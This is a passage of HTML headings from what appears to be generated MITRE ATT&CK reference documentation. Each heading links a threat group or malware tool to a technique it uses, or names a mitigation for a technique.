<h3 id="_winmm_s0059_uses_system_information_discovery_t1082"><a class="anchor" href="#_winmm_s0059_uses_system_information_discovery_t1082"></a><a class="link" href="#_winmm_s0059_uses_system_information_discovery_t1082">WinMM (S0059) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_remote_desktop_protocol_mitigation_t1076_mitigates_remote_desktop_protocol_t1076"><a class="anchor" href="#_remote_desktop_protocol_mitigation_t1076_mitigates_remote_desktop_protocol_t1076"></a><a class="link" href="#_remote_desktop_protocol_mitigation_t1076_mitigates_remote_desktop_protocol_t1076">Remote Desktop Protocol Mitigation (T1076) mitigates Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_system_information_discovery_t1082"><a class="anchor" href="#_prikormka_s0113_uses_system_information_discovery_t1082"></a><a class="link" href="#_prikormka_s0113_uses_system_information_discovery_t1082">Prikormka (S0113) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_install_root_certificate_t1130"><a class="anchor" href="#_rtm_s0148_uses_install_root_certificate_t1130"></a><a class="link" href="#_rtm_s0148_uses_install_root_certificate_t1130">RTM (S0148) uses Install Root Certificate (T1130)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_remote_file_copy_t1105"><a class="anchor" href="#_remsec_s0125_uses_remote_file_copy_t1105"></a><a class="link" href="#_remsec_s0125_uses_remote_file_copy_t1105">Remsec (S0125) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_shotput_s0063"><a class="anchor" href="#_apt3_g0022_uses_shotput_s0063"></a><a class="link" href="#_apt3_g0022_uses_shotput_s0063">APT3 (G0022) uses SHOTPUT (S0063)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_h1n1_s0132_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_h1n1_s0132_uses_replication_through_removable_media_t1091">H1N1 (S0132) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_bronze_butler_g0060_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_bronze_butler_g0060_uses_standard_cryptographic_protocol_t1032">BRONZE BUTLER (G0060) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_shortcut_modification_t1023"><a class="anchor" href="#_seaduke_s0053_uses_shortcut_modification_t1023"></a><a class="link" href="#_seaduke_s0053_uses_shortcut_modification_t1023">SeaDuke (S0053) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_command_line_interface_t1059"><a class="anchor" href="#_rtm_s0148_uses_command_line_interface_t1059"></a><a class="link" href="#_rtm_s0148_uses_command_line_interface_t1059">RTM (S0148) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_modify_registry_t1112"><a class="anchor" href="#_advstoreshell_s0045_uses_modify_registry_t1112"></a><a class="link" href="#_advstoreshell_s0045_uses_modify_registry_t1112">ADVSTORESHELL (S0045) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_textmate_s0146"><a class="anchor" href="#_fin7_g0046_uses_textmate_s0146"></a><a class="link" href="#_fin7_g0046_uses_textmate_s0146">FIN7 (G0046) uses TEXTMATE (S0146)</a></h3>
</div>
<div class="sect2">
<h3 id="_netsh_s0108_uses_disabling_security_tools_t1089"><a class="anchor" href="#_netsh_s0108_uses_disabling_security_tools_t1089"></a><a class="link" href="#_netsh_s0108_uses_disabling_security_tools_t1089">netsh (S0108) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_psexec_s0029"><a class="anchor" href="#_carbanak_g0008_uses_psexec_s0029"></a><a class="link" href="#_carbanak_g0008_uses_psexec_s0029">Carbanak (G0008) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_dynamic_data_exchange_t1173"><a class="anchor" href="#_fin7_g0046_uses_dynamic_data_exchange_t1173"></a><a class="link" href="#_fin7_g0046_uses_dynamic_data_exchange_t1173">FIN7 (G0046) uses Dynamic Data Exchange (T1173)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_fallback_channels_t1008"><a class="anchor" href="#_mis_type_s0084_uses_fallback_channels_t1008"></a><a class="link" href="#_mis_type_s0084_uses_fallback_channels_t1008">Mis-Type (S0084) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_command_line_interface_t1059"><a class="anchor" href="#_threat_group_1314_g0028_uses_command_line_interface_t1059"></a><a class="link" href="#_threat_group_1314_g0028_uses_command_line_interface_t1059">Threat Group-1314 (G0028) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_powershell_t1086"><a class="anchor" href="#_fin6_g0037_uses_powershell_t1086"></a><a class="link" href="#_fin6_g0037_uses_powershell_t1086">FIN6 (G0037) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_remote_file_copy_t1105"><a class="anchor" href="#_helminth_s0170_uses_remote_file_copy_t1105"></a><a class="link" href="#_helminth_s0170_uses_remote_file_copy_t1105">Helminth (S0170) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_scheduled_task_t1053"><a class="anchor" href="#_menupass_g0045_uses_scheduled_task_t1053"></a><a class="link" href="#_menupass_g0045_uses_scheduled_task_t1053">menuPass (G0045) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_sys10_s0060_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_sys10_s0060_uses_permission_groups_discovery_t1069">Sys10 (S0060) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_blackenergy_s0089_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_blackenergy_s0089_uses_windows_management_instrumentation_t1047">BlackEnergy (S0089) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_remote_system_discovery_t1018"><a class="anchor" href="#_sykipot_s0018_uses_remote_system_discovery_t1018"></a><a class="link" href="#_sykipot_s0018_uses_remote_system_discovery_t1018">Sykipot (S0018) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_4h_rat_s0065_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_4h_rat_s0065_uses_standard_application_layer_protocol_t1071">4H RAT (S0065) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_remote_file_copy_t1105"><a class="anchor" href="#_felismus_s0171_uses_remote_file_copy_t1105"></a><a class="link" href="#_felismus_s0171_uses_remote_file_copy_t1105">Felismus (S0171) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_data_from_local_system_t1005"><a class="anchor" href="#_apt3_g0022_uses_data_from_local_system_t1005"></a><a class="link" href="#_apt3_g0022_uses_data_from_local_system_t1005">APT3 (G0022) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_credential_dumping_t1003"><a class="anchor" href="#_h1n1_s0132_uses_credential_dumping_t1003"></a><a class="link" href="#_h1n1_s0132_uses_credential_dumping_t1003">H1N1 (S0132) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_system_information_discovery_t1082"><a class="anchor" href="#_wingbird_s0176_uses_system_information_discovery_t1082"></a><a class="link" href="#_wingbird_s0176_uses_system_information_discovery_t1082">Wingbird (S0176) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_modify_registry_t1112"><a class="anchor" href="#_chopstick_s0023_uses_modify_registry_t1112"></a><a class="link" href="#_chopstick_s0023_uses_modify_registry_t1112">CHOPSTICK (S0023) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_credential_dumping_t1003"><a class="anchor" href="#_trojan_karagany_s0094_uses_credential_dumping_t1003"></a><a class="link" href="#_trojan_karagany_s0094_uses_credential_dumping_t1003">Trojan.Karagany (S0094) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_system_information_discovery_t1082"><a class="anchor" href="#_t9000_s0098_uses_system_information_discovery_t1082"></a><a class="link" href="#_t9000_s0098_uses_system_information_discovery_t1082">T9000 (S0098) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_unknown_logger_s0130_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_unknown_logger_s0130_uses_system_network_configuration_discovery_t1016">Unknown Logger (S0130) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_credentials_in_files_t1081"><a class="anchor" href="#_prikormka_s0113_uses_credentials_in_files_t1081"></a><a class="link" href="#_prikormka_s0113_uses_credentials_in_files_t1081">Prikormka (S0113) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_remote_file_copy_t1105"><a class="anchor" href="#_dragonfly_g0035_uses_remote_file_copy_t1105"></a><a class="link" href="#_dragonfly_g0035_uses_remote_file_copy_t1105">Dragonfly (G0035) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_timestomp_t1099"><a class="anchor" href="#_cobalt_strike_s0154_uses_timestomp_t1099"></a><a class="link" href="#_cobalt_strike_s0154_uses_timestomp_t1099">Cobalt Strike (S0154) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_data_encrypted_t1022"><a class="anchor" href="#_bronze_butler_g0060_uses_data_encrypted_t1022"></a><a class="link" href="#_bronze_butler_g0060_uses_data_encrypted_t1022">BRONZE BUTLER (G0060) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_service_execution_t1035"><a class="anchor" href="#_cobalt_strike_s0154_uses_service_execution_t1035"></a><a class="link" href="#_cobalt_strike_s0154_uses_service_execution_t1035">Cobalt Strike (S0154) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_scripting_t1064"><a class="anchor" href="#_dragonfly_g0035_uses_scripting_t1064"></a><a class="link" href="#_dragonfly_g0035_uses_scripting_t1064">Dragonfly (G0035) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_backspace_s0031_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_backspace_s0031_uses_registry_run_keys_start_folder_t1060">BACKSPACE (S0031) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_carbanak_s0030"><a class="anchor" href="#_fin7_g0046_uses_carbanak_s0030"></a><a class="link" href="#_fin7_g0046_uses_carbanak_s0030">FIN7 (G0046) uses Carbanak (S0030)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_system_information_discovery_t1082"><a class="anchor" href="#_elise_s0081_uses_system_information_discovery_t1082"></a><a class="link" href="#_elise_s0081_uses_system_information_discovery_t1082">Elise (S0081) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_connection_proxy_t1090"><a class="anchor" href="#_apt28_g0007_uses_connection_proxy_t1090"></a><a class="link" href="#_apt28_g0007_uses_connection_proxy_t1090">APT28 (G0007) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_cmd_s0106"><a class="anchor" href="#_bronze_butler_g0060_uses_cmd_s0106"></a><a class="link" href="#_bronze_butler_g0060_uses_cmd_s0106">BRONZE BUTLER (G0060) uses cmd (S0106)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_bootkit_t1067"><a class="anchor" href="#_lazarus_group_g0032_uses_bootkit_t1067"></a><a class="link" href="#_lazarus_group_g0032_uses_bootkit_t1067">Lazarus Group (G0032) uses Bootkit (T1067)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_ke3chang_g0004_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_ke3chang_g0004_uses_file_and_directory_discovery_t1083">Ke3chang (G0004) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_command_line_interface_t1059"><a class="anchor" href="#_felismus_s0171_uses_command_line_interface_t1059"></a><a class="link" href="#_felismus_s0171_uses_command_line_interface_t1059">Felismus (S0171) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_data_encoding_t1132"><a class="anchor" href="#_badnews_s0128_uses_data_encoding_t1132"></a><a class="link" href="#_badnews_s0128_uses_data_encoding_t1132">BADNEWS (S0128) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_putter_panda_g0024_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_putter_panda_g0024_uses_obfuscated_files_or_information_t1027">Putter Panda (G0024) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_onionduke_s0052"><a class="anchor" href="#_apt29_g0016_uses_onionduke_s0052"></a><a class="link" href="#_apt29_g0016_uses_onionduke_s0052">APT29 (G0016) uses OnionDuke (S0052)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_automated_collection_t1119"><a class="anchor" href="#_threat_group_3390_g0027_uses_automated_collection_t1119"></a><a class="link" href="#_threat_group_3390_g0027_uses_automated_collection_t1119">Threat Group-3390 (G0027) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_scheduled_task_t1053"><a class="anchor" href="#_apt32_g0050_uses_scheduled_task_t1053"></a><a class="link" href="#_apt32_g0050_uses_scheduled_task_t1053">APT32 (G0050) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_molerats_g0021_uses_dustysky_s0062"><a class="anchor" href="#_molerats_g0021_uses_dustysky_s0062"></a><a class="link" href="#_molerats_g0021_uses_dustysky_s0062">Molerats (G0021) uses DustySky (S0062)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_connection_proxy_t1090"><a class="anchor" href="#_gazer_s0168_uses_connection_proxy_t1090"></a><a class="link" href="#_gazer_s0168_uses_connection_proxy_t1090">Gazer (S0168) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_net_s0039"><a class="anchor" href="#_menupass_g0045_uses_net_s0039"></a><a class="link" href="#_menupass_g0045_uses_net_s0039">menuPass (G0045) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_create_account_t1136"><a class="anchor" href="#_apt3_g0022_uses_create_account_t1136"></a><a class="link" href="#_apt3_g0022_uses_create_account_t1136">APT3 (G0022) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118_uses_commonly_used_port_t1043"><a class="anchor" href="#_nidiran_s0118_uses_commonly_used_port_t1043"></a><a class="link" href="#_nidiran_s0118_uses_commonly_used_port_t1043">Nidiran (S0118) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_certutil_s0160_uses_remote_file_copy_t1105"><a class="anchor" href="#_certutil_s0160_uses_remote_file_copy_t1105"></a><a class="link" href="#_certutil_s0160_uses_remote_file_copy_t1105">certutil (S0160) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_new_service_t1050"><a class="anchor" href="#_apt3_g0022_uses_new_service_t1050"></a><a class="link" href="#_apt3_g0022_uses_new_service_t1050">APT3 (G0022) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_advstoreshell_s0045_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_advstoreshell_s0045_uses_standard_application_layer_protocol_t1071">ADVSTORESHELL (S0045) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_uncommonly_used_port_mitigation_t1065_mitigates_uncommonly_used_port_t1065"><a class="anchor" href="#_uncommonly_used_port_mitigation_t1065_mitigates_uncommonly_used_port_t1065"></a><a class="link" href="#_uncommonly_used_port_mitigation_t1065_mitigates_uncommonly_used_port_t1065">Uncommonly Used Port Mitigation (T1065) mitigates Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_bronze_butler_g0060_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_bronze_butler_g0060_uses_custom_cryptographic_protocol_t1024">BRONZE BUTLER (G0060) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_create_account_t1136"><a class="anchor" href="#_net_s0039_uses_create_account_t1136"></a><a class="link" href="#_net_s0039_uses_create_account_t1136">Net (S0039) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_scripting_t1064"><a class="anchor" href="#_apt3_g0022_uses_scripting_t1064"></a><a class="link" href="#_apt3_g0022_uses_scripting_t1064">APT3 (G0022) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_jhuhugit_s0044_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_jhuhugit_s0044_uses_obfuscated_files_or_information_t1027">JHUHUGIT (S0044) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_data_from_network_shared_drive_t1039"><a class="anchor" href="#_bronze_butler_g0060_uses_data_from_network_shared_drive_t1039"></a><a class="link" href="#_bronze_butler_g0060_uses_data_from_network_shared_drive_t1039">BRONZE BUTLER (G0060) uses Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_helminth_s0170_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_helminth_s0170_uses_standard_cryptographic_protocol_t1032">Helminth (S0170) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_sid_history_injection_t1178"><a class="anchor" href="#_mimikatz_s0002_uses_sid_history_injection_t1178"></a><a class="link" href="#_mimikatz_s0002_uses_sid_history_injection_t1178">Mimikatz (S0002) uses SID-History Injection (T1178)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_system_time_discovery_t1124"><a class="anchor" href="#_powerduke_s0139_uses_system_time_discovery_t1124"></a><a class="link" href="#_powerduke_s0139_uses_system_time_discovery_t1124">PowerDuke (S0139) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_fallback_channels_t1008"><a class="anchor" href="#_chopstick_s0023_uses_fallback_channels_t1008"></a><a class="link" href="#_chopstick_s0023_uses_fallback_channels_t1008">CHOPSTICK (S0023) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_video_capture_mitigation_t1125_mitigates_video_capture_t1125"><a class="anchor" href="#_video_capture_mitigation_t1125_mitigates_video_capture_t1125"></a><a class="link" href="#_video_capture_mitigation_t1125_mitigates_video_capture_t1125">Video Capture Mitigation (T1125) mitigates Video Capture (T1125)</a></h3>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_g0029_uses_fakem_s0076"><a class="anchor" href="#_scarlet_mimic_g0029_uses_fakem_s0076"></a><a class="link" href="#_scarlet_mimic_g0029_uses_fakem_s0076">Scarlet Mimic (G0029) uses FakeM (S0076)</a></h3>
</div>
<div class="sect2">
<h3 id="_phoreal_s0158_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_phoreal_s0158_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_phoreal_s0158_uses_standard_non_application_layer_protocol_t1095">PHOREAL (S0158) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_access_token_manipulation_t1134"><a class="anchor" href="#_sslmm_s0058_uses_access_token_manipulation_t1134"></a><a class="link" href="#_sslmm_s0058_uses_access_token_manipulation_t1134">SslMM (S0058) uses Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_xtunnel_s0117_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_xtunnel_s0117_uses_standard_cryptographic_protocol_t1032">XTunnel (S0117) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_chches_s0144_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_chches_s0144_uses_file_and_directory_discovery_t1083">ChChes (S0144) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_sslmm_s0058"><a class="anchor" href="#_naikon_g0019_uses_sslmm_s0058"></a><a class="link" href="#_naikon_g0019_uses_sslmm_s0058">Naikon (G0019) uses SslMM (S0058)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_remote_system_discovery_t1018"><a class="anchor" href="#_net_s0039_uses_remote_system_discovery_t1018"></a><a class="link" href="#_net_s0039_uses_remote_system_discovery_t1018">Net (S0039) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_group5_g0043_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_group5_g0043_uses_uncommonly_used_port_t1065">Group5 (G0043) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_data_obfuscation_t1001"><a class="anchor" href="#_h1n1_s0132_uses_data_obfuscation_t1001"></a><a class="link" href="#_h1n1_s0132_uses_data_obfuscation_t1001">H1N1 (S0132) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_neteagle_s0034_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_neteagle_s0034_uses_standard_application_layer_protocol_t1071">NETEAGLE (S0034) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_process_discovery_t1057"><a class="anchor" href="#_jhuhugit_s0044_uses_process_discovery_t1057"></a><a class="link" href="#_jhuhugit_s0044_uses_process_discovery_t1057">JHUHUGIT (S0044) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_bubblewrap_s0043_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_bubblewrap_s0043_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_bubblewrap_s0043_uses_standard_application_layer_protocol_t1071">BUBBLEWRAP (S0043) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_pwdump_s0006"><a class="anchor" href="#_fin5_g0053_uses_pwdump_s0006"></a><a class="link" href="#_fin5_g0053_uses_pwdump_s0006">FIN5 (G0053) uses pwdump (S0006)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_credential_dumping_t1003"><a class="anchor" href="#_sowbug_g0054_uses_credential_dumping_t1003"></a><a class="link" href="#_sowbug_g0054_uses_credential_dumping_t1003">Sowbug (G0054) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_credential_dumping_t1003"><a class="anchor" href="#_cozycar_s0046_uses_credential_dumping_t1003"></a><a class="link" href="#_cozycar_s0046_uses_credential_dumping_t1003">CozyCar (S0046) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_query_registry_t1012"><a class="anchor" href="#_shamoon_s0140_uses_query_registry_t1012"></a><a class="link" href="#_shamoon_s0140_uses_query_registry_t1012">Shamoon (S0140) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_sakula_s0074_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_sakula_s0074_uses_bypass_user_account_control_t1088">Sakula (S0074) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_fallback_channels_t1008"><a class="anchor" href="#_jhuhugit_s0044_uses_fallback_channels_t1008"></a><a class="link" href="#_jhuhugit_s0044_uses_fallback_channels_t1008">JHUHUGIT (S0044) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_process_discovery_t1057"><a class="anchor" href="#_dustysky_s0062_uses_process_discovery_t1057"></a><a class="link" href="#_dustysky_s0062_uses_process_discovery_t1057">DustySky (S0062) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_third_party_software_t1072"><a class="anchor" href="#_threat_group_1314_g0028_uses_third_party_software_t1072"></a><a class="link" href="#_threat_group_1314_g0028_uses_third_party_software_t1072">Threat Group-1314 (G0028) uses Third-party Software (T1072)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinytyphon_s0131_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_tinytyphon_s0131_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_tinytyphon_s0131_uses_obfuscated_files_or_information_t1027">TINYTYPHON (S0131) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_mobileorder_s0079_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_mobileorder_s0079_uses_uncommonly_used_port_t1065">MobileOrder (S0079) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_4h_rat_s0065"><a class="anchor" href="#_putter_panda_g0024_uses_4h_rat_s0065"></a><a class="link" href="#_putter_panda_g0024_uses_4h_rat_s0065">Putter Panda (G0024) uses 4H RAT (S0065)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_new_service_t1050"><a class="anchor" href="#_reaver_s0172_uses_new_service_t1050"></a><a class="link" href="#_reaver_s0172_uses_new_service_t1050">Reaver (S0172) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_mivast_s0080_uses_commonly_used_port_t1043"><a class="anchor" href="#_mivast_s0080_uses_commonly_used_port_t1043"></a><a class="link" href="#_mivast_s0080_uses_commonly_used_port_t1043">Mivast (S0080) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_disabling_security_tools_t1089"><a class="anchor" href="#_dragonfly_g0035_uses_disabling_security_tools_t1089"></a><a class="link" href="#_dragonfly_g0035_uses_disabling_security_tools_t1089">Dragonfly (G0035) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_application_window_discovery_t1010"><a class="anchor" href="#_lazarus_group_g0032_uses_application_window_discovery_t1010"></a><a class="link" href="#_lazarus_group_g0032_uses_application_window_discovery_t1010">Lazarus Group (G0032) uses Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_logon_scripts_mitigation_t1037_mitigates_logon_scripts_t1037"><a class="anchor" href="#_logon_scripts_mitigation_t1037_mitigates_logon_scripts_t1037"></a><a class="link" href="#_logon_scripts_mitigation_t1037_mitigates_logon_scripts_t1037">Logon Scripts Mitigation (T1037) mitigates Logon Scripts (T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_file_deletion_t1107"><a class="anchor" href="#_hi_zor_s0087_uses_file_deletion_t1107"></a><a class="link" href="#_hi_zor_s0087_uses_file_deletion_t1107">Hi-Zor (S0087) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_windows_admin_shares_t1077"><a class="anchor" href="#_apt3_g0022_uses_windows_admin_shares_t1077"></a><a class="link" href="#_apt3_g0022_uses_windows_admin_shares_t1077">APT3 (G0022) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
